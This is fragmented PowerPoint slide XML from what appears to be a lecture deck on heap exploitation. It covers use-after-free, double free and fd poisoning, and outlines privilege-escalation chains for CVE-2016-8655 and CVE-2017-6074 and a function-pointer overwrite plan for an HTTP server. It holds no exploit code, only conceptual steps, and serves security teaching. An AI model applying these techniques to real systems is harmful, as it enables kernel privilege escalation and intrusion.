              <a:t>Less heap feng shui</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited usage – until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cleanup_request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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set object (headers)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6F722-9E91-F54B-94B2-7C251BF7B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Double Free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45489-F99B-0A44-8F94-FCBFFD9DB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4639131" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More steps – trying to get UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires precision in allocation amounts &amp; sizes to NOT crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>later</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free arbitrary objects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814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D3A4-2CE3-4143-8588-D6540B73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All Techniques Fail?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FB90F55-0966-EF9E-DC1D-D5854D0E60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23631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0BE1-4972-BF46-BC1E-208DA5A8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Off the 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8F35-DD1F-3E4A-B8A7-0657A85E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03997" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Application defined objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Hunter-Gatherer Societies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DAAF100-F850-8147-991E-81C7D068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498" y="1677812"/>
            <a:ext cx="5243003" cy="295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009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BB7C-C230-BB4B-B1E9-88759707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Object?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470DC-4BD1-6C4B-BA91-C1FB360FD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Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Pointers (any pointers really) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Ids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing – even size extendable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Server response struct. How to attack this? ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15DA4A0-0296-F548-8A15-742A052C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29748"/>
            <a:ext cx="4178300" cy="1866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DEEF53-86D4-5A4E-BE9A-59F43977A585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3489931" y="2867487"/>
            <a:ext cx="3017401" cy="77235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2C21E7-461D-694C-AF2E-9BC494D75972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3003138" y="3639844"/>
            <a:ext cx="3903689" cy="35658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129CE6-B4A5-DD45-ACFC-91342CD58BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464608" y="2560866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OOB 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D62C67-31F3-9D48-A00D-1071AF8B79C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6839000" y="3350099"/>
            <a:ext cx="197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Arbitrary read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95488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95F3-759D-804D-9AD4-46A4016D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timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Linux Networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BBE2D6-3007-1942-B56B-880C978F3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570" y="1867096"/>
            <a:ext cx="5788240" cy="31427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3FE639-9DCE-3440-8F44-B563520B17A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535820" y="2103104"/>
            <a:ext cx="5370990" cy="10585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69BF84-39F6-4F49-96F1-64E3E1E19822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3668162" y="1743559"/>
            <a:ext cx="3011607" cy="51776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85B4B3-6677-1B48-8A05-2A051B998B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588595" y="1420393"/>
            <a:ext cx="212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 List pointer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472479-2E34-0247-BCB0-33B7F577A9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3828311" y="2398720"/>
            <a:ext cx="2851458" cy="10005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4D466C-FBEA-9F4B-894F-6983C6A88150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6634182" y="2178814"/>
            <a:ext cx="212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Timer amount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675698-0C90-C74D-A8C7-B442F193F78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5786264" y="2776621"/>
            <a:ext cx="1621926" cy="32122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2D0661-7EEC-1B40-BCF5-0A5A910B6D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7408190" y="2937235"/>
            <a:ext cx="212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Callback function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88C395-442D-1D4D-9489-5B8478D0D7FD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527776" y="3007268"/>
            <a:ext cx="2470756" cy="108420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0059C0-0BD3-744B-AA36-828469DBC085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998532" y="3768304"/>
            <a:ext cx="2928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 for callback function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31192961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3118-1D18-A845-AA6C-1F50E62D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CVE-2016-8655 Exploitation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678A-F26F-6147-8F25-D932AF5C0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87090"/>
            <a:ext cx="8344869" cy="2281574"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race condition leads to UAF on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struct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timer_lst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b="1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Spray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to swap in our fake object to control ‘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function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’ and ‘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’</a:t>
            </a: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Call multiple times: </a:t>
            </a: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Make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vsyscall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page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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writable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to modify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modprobe_path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Load kernel module which is root shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BEF9B9-02A3-D748-AAE8-FD4D8BBFA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301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435926" y="3440203"/>
            <a:ext cx="7708074" cy="17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3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3118-1D18-A845-AA6C-1F50E62D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90363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CVE-2017-6074 Exploitation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678A-F26F-6147-8F25-D932AF5C0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924" y="718485"/>
            <a:ext cx="8678083" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Bad reference counting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leads to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>double free</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>double free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to free a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timer_lst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/>
              <a:t>object </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Swap in a fake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struct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timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to control function pointer and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call twice: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable SMAP &amp; SMEP (kernel-land code execution protections) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jump to user-defined shellcode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4" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BEF9B9-02A3-D748-AAE8-FD4D8BBFA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301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435926" y="3440203"/>
            <a:ext cx="7708074" cy="17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1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DD0C-CA33-A347-8FF6-4157A2F6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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="HTTP request in hex">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3259C1B-3EA5-3C45-AB4D-5666E5809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1" y="3027285"/>
            <a:ext cx="9130995" cy="1180731"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F887B84-216C-CE43-857D-2A611076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315" y="273846"/>
            <a:ext cx="3791072" cy="24356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69C5D-7C8A-1F42-9D52-411449B74DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726097" y="3311370"/>
            <a:ext cx="8611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2888C-6E9F-164B-BA08-C39AC8EE779F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480873" y="3872142"/>
            <a:ext cx="71761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F9E0BF-A929-4C4F-B667-76DF9C7DC033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290220" y="3872142"/>
            <a:ext cx="71761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53D742-008C-3E4E-A932-AC24CC9A83C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231034" y="2796465"/>
            <a:ext cx="0" cy="10298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5DF9B2-17AD-D747-8AC6-682094EBD476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27370" y="2427133"/>
            <a:ext cx="324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Separation of Headers and Body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C8B444-0BD3-4E41-AD3D-0BCA348129CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8328919" y="1199964"/>
            <a:ext cx="66730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95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6B2A-1853-DC4C-8F91-DA7FFFFD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UAF – Solution Diagram (Review)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C1B062E6-0C7D-E74D-BA47-2E2CA236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37" y="1369219"/>
            <a:ext cx="5686263" cy="25155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71F73-3DDC-104B-BA9C-1D75C1191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02936"/>
            <a:ext cx="4252404" cy="3963420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PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt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Player Struct</a:t>
            </a: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UAF object gets corrupted by another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16146795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0721-318A-C240-AAE0-556D52B9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Fd Poison - Throwback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6F432B81-2BAC-8A4C-97E4-731617EA3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8650" y="2154392"/>
            <a:ext cx="3886200" cy="169315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894F3D-C993-419A-BB94-E958C43DF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Overwrite the data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>important_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with our data via the fake chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Allocate the chunk and overwrite the data inside ofit">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857E359-E74E-B544-840A-85464DF87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390" y="2626320"/>
            <a:ext cx="4085551" cy="15160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7931F-80D5-1C48-AB9A-AFB33230F2EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1102936"/>
            <a:ext cx="4252404" cy="3963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UAF (victim) chunk corrupts another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212595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6B2A-1853-DC4C-8F91-DA7FFFFD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UAF – Solution Diagram (Review)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71F73-3DDC-104B-BA9C-1D75C1191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02936"/>
            <a:ext cx="4252404" cy="3963420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New object corrupts UAF chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF chunk to corrupt new object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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6027753A-37CB-C244-A456-848AF8C1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0734"/>
            <a:ext cx="3886200" cy="1693157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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C1B062E6-0C7D-E74D-BA47-2E2CA2361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20"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3879542" y="1407944"/>
            <a:ext cx="5264458" cy="24114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E510A5-A889-DC4B-86E1-20FB5A4374EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3435658" y="1473693"/>
            <a:ext cx="1402672" cy="2308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4765DC-F69C-1A4E-ADEA-04056496DA9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467035" y="2319234"/>
            <a:ext cx="476065" cy="132948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232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101FAACB-0A63-FA48-4D22-64DF8FE7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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The World is Your Oyster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76FDE7-0147-F04D-8D2F-015528EB7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6" b="22422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829158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3CEB-5926-C54E-A050-EF037723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Targets in HTTP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56466-3200-344C-828F-098F4D1B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Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Pointers (any pointers really) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Ids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing – even size extendable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All controllable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0550EB-40AE-4C45-B2F1-B598EB56C232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458310" y="3693965"/>
            <a:ext cx="3886200" cy="6068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Check in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i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server.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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821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3CEB-5926-C54E-A050-EF0377230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My Favorite Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1635F8E5-36DD-E94E-ABED-F4A7DBF22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" y="1731202"/>
            <a:ext cx="4445108" cy="225589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56466-3200-344C-828F-098F4D1B8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Important Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Function Pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Sizing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>All controllable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DE87F-8BFD-9945-A21D-085EACFCCDD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487062" y="3615303"/>
            <a:ext cx="408493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2812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Plan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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130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Goal: overwrite function pointer of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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer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94DBD77-26D9-8641-908C-2E960DB6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1348"/>
            <a:ext cx="4361804" cy="40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6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Plan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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130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Free the header to trigger UAF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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Header is free - in the TCache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C23C957-81DE-F54B-82F2-D578ED1D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532659"/>
            <a:ext cx="6710766" cy="30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73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Plan –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9" y="1236540"/>
            <a:ext cx="4695756" cy="1151512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Allocate same chunk</a:t>
            </a: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Two pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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own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the same memory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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer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330EFE4-D847-C74B-BAB0-A0AB5F25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00" y="1268019"/>
            <a:ext cx="5727770" cy="3325801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6EE6FE7-050D-2546-B7B9-95A62B981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94" t="49807" r="5966" b="25415"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865747" y="3625860"/>
            <a:ext cx="1743560" cy="824052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9BC8CB-5B02-1A46-ABD5-D58B5BDCC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" y="2388052"/>
            <a:ext cx="3463685" cy="17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917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54F-FBBC-5D45-ABE6-058A0F1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Plan –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57-4C63-A745-8092-89183BFB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59" y="1236539"/>
            <a:ext cx="3370649" cy="1770131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Other object 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writes its data</a:t>
            </a:r>
          </a:p>
          <a:p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Corrupts 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Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> along the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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
